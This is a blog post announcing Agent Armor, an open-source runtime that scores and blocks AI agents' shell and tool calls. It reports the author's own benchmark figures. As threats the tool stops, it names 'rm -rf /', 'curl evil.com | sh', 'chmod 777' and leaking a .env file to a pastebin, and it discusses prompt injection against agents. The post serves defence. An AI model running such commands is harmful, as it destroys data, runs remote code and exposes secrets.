I built an open-source zero-trust security runtime for AI agents. Here’s what I learned.

Edoardo Bambini — Wed, 08 Apr 2026 06:32:40 +0000

The problem nobody is talking about
You give an AI agent access to your terminal. It can run shell commands, read your filesystem, query your database, call external APIs.
Now ask yourself: what’s stopping it from running rm -rf /? Or curl evil.com | sh? Or exfiltrating your .env to a pastebin?
The answer, for most teams right now, is nothing.
Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. But none of them govern what agents actually do with that power.
I kept running into this gap while building IAGA, an LLM governance platform. So I built Agent Armor to fix it.
What Agent Armor does
Agent Armor is a zero-trust security runtime. Every single action an agent tries to perform passes through a deterministic 8-layer pipeline before anything touches your infrastructure. The verdict is always one of three: allow, review, or block.
No LLM in the loop for decisions. No probabilistic guessing. Pure deterministic evaluation.
Here’s what the 8 layers look like:
1. Protocol DPI — Deep packet inspection for MCP, ACP, and HTTP function calls. Schema validation against registered tool definitions.
2. Taint Tracking — Tracks data provenance through agent execution. Catches credential leaks and exfiltration attempts.
3. NHI Registry — Non-human identity management with HMAC-SHA256 attestation. Every agent becomes a first-class identity.
4. Risk Scoring — Adaptive 5-weight composite model: statistical, contextual, behavioral, temporal, reputation.
5. Impact Analysis — Pre-execution risk assessment with command analysis and impact prediction.
6. Policy Engine — Workspace-level rules: tool permissions, protocol restrictions, domain allowlists.
7. Injection Firewall — 3-stage prompt injection defense: pattern matching, entropy analysis, structural validation.
8. Observability — OpenTelemetry-compatible spans, real-time SSE stream, webhook integrations.
On top of that, there’s response scanning for PII and secrets, per-agent rate limiting, behavioral fingerprinting, and a threat intelligence feed.
The benchmark
I didn’t want to ship this without hard numbers. We tested Agent Armor against 16 real-world scenarios (both attack and benign), 50 repetitions each, 800 total requests.

Metric	Result
Decision accuracy	99.8%
False positives	0
Pipeline latency	~2.4ms across all 8 layers
Risk score range	1 to 88 (continuous, not binary)
Attack categories tested	9

A curl | sh scores 88. A chmod 777 scores 82. A prompt injection attempt scores 76. Every action gets a quantified risk score, not just a pass/fail.
Why Rust
I wanted governance decisions to be fast enough that agents don’t even notice the overhead. 2.4ms for 8 full security layers was only possible because the entire pipeline runs in Rust on Tokio, with no garbage collection pauses and no cold starts.
The dashboard is embedded directly in the binary via include_str!(). No React, no webpack, no separate frontend build. One binary, zero frontend dependencies.
Tech stack: Rust + Tokio, Axum 0.8, SQLite via sqlx, Argon2 auth, HMAC-SHA256 crypto, OpenTelemetry, SSE for real-time events.
Getting started
One command:

docker compose up -d

Or from source:

git clone https://github.com/EdoardoBambini/Agent-Armor-Iaga.git
cd Agent-Armor-Iaga/community
cargo build --release
./target/release/agent-armor serve

It also works as an MCP proxy for Claude Desktop. Add it to your claude_desktop_config.json and every tool call passes through the pipeline before reaching your MCP server.
Open-core model
The full 8-layer pipeline, response scanning, rate limiting, fingerprinting, and threat intelligence are all open source under BUSL-1.1 (converts to Apache 2.0 after 4 years). Enterprise adds multi-tenant, SSO/SAML, SIEM integration, and advanced ML-powered injection detection.
What I learned building this
The biggest lesson: security for AI agents can’t work the same way traditional application security does. Agents are non-deterministic by nature, they take different paths every time, and they combine tools in ways you can’t predict upfront. That’s exactly why the governance layer needs to be deterministic. You need a system that evaluates every action on its own merits, in real time, regardless of what the agent “intended” to do.
The second lesson: latency matters more than features. If your governance layer adds 500ms to every tool call, teams will disable it. At 2.4ms, it’s invisible.
Try it, break it, tell me what’s wrong
I’m actively developing this and would genuinely love feedback from this community. If you find a scenario Agent Armor handles badly, open an issue. If you think a layer is missing, tell me.
And if you find it useful, a star on the repo helps more than you’d think for an early-stage open source project.

EdoardoBambini / Agent-Armor-Iaga

AI agents are getting tool access — shell, file system, databases, APIs, secrets. But nobody is governing what they actually do with it. Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. Agent Armor gives you the power to control, audit, and approve every single action before it happens.

Agent Armor

Zero-Trust Security Runtime for Autonomous AI Agents

Quick Start • 8 Layers • API • Dashboard • Config • Architecture

The Problem

AI agents are getting tool access — shell, file system, databases, APIs, secrets. But nobody is governing what they actually do with it.

Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. Agent Armor gives you the power to control, audit, and approve every single action before it happens.

Why Agent Armor

Without Agent Armor	With Agent Armor
Agent runs `rm -rf /`	Agent tries `rm -rf /` → BLOCKED at risk score 82
Agent runs `curl evil.com \| sh`	8-layer composite scores it 88/100 → highest threat tier
Agent exfiltrates secrets to Pastebin	Injection firewall catches prompt attack → SAFE
"How dangerous was that action?" → no answer	Continuous risk scores 1-88 with per-layer breakdown → QUANTIFIED
"What did

…

View on GitHub

DEV Community: Edoardo Bambini

I built an open-source zero-trust security runtime for AI agents. Here’s what I learned.

EdoardoBambini / Agent-Armor-Iaga

Agent Armor

The Problem

Why Agent Armor